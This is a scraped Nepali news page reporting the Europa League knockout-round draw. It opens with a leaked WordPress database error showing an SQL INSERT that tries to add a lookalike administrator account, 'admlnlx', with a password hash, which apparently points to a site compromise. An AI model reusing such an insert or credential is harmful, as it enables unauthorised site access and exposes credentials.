WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDmzzTbLl7lOuNCYxNjaUeYz3vAXrh1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 10:31:50', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर २८–
युरोपा लिग फुटबलको नकआउट चरणको खेल तालिका गएराति सार्वजनिक भएको छ। सोमबार राति सार्वजनिक भएको ड्र अनुसार म्यानचेस्टर युनाइटेडले नकआउट चरणको खेलमा फ्रान्सको क्लब सेन्ट इटिएन्नेसँग प्रतिस्पर्धा गर्ने छ। यस्तै टोटनह्यामले बेल्जियमको क्लब केएए जेन्ट, स्पेनिस क्लब एथ्लेटिको बिल्बाओ साइप्रसको क्लब एपोइल एफसीसँग तथा भिल्लारियल इटालियन क्लब रोमासँग खेल्ने छ। यस्तै लेगियाले अजाक्स विरूद्ध खेल्नेछ।
अन्तिम ३२ को पहिलो लेगमा सबै खेलमा आउँदो फेब्रुअरी १६ मा हुनेछ । यस्तै दोस्रो लेगका खेल फेब्रुअरी २२ र २३ मा हुनेछ ।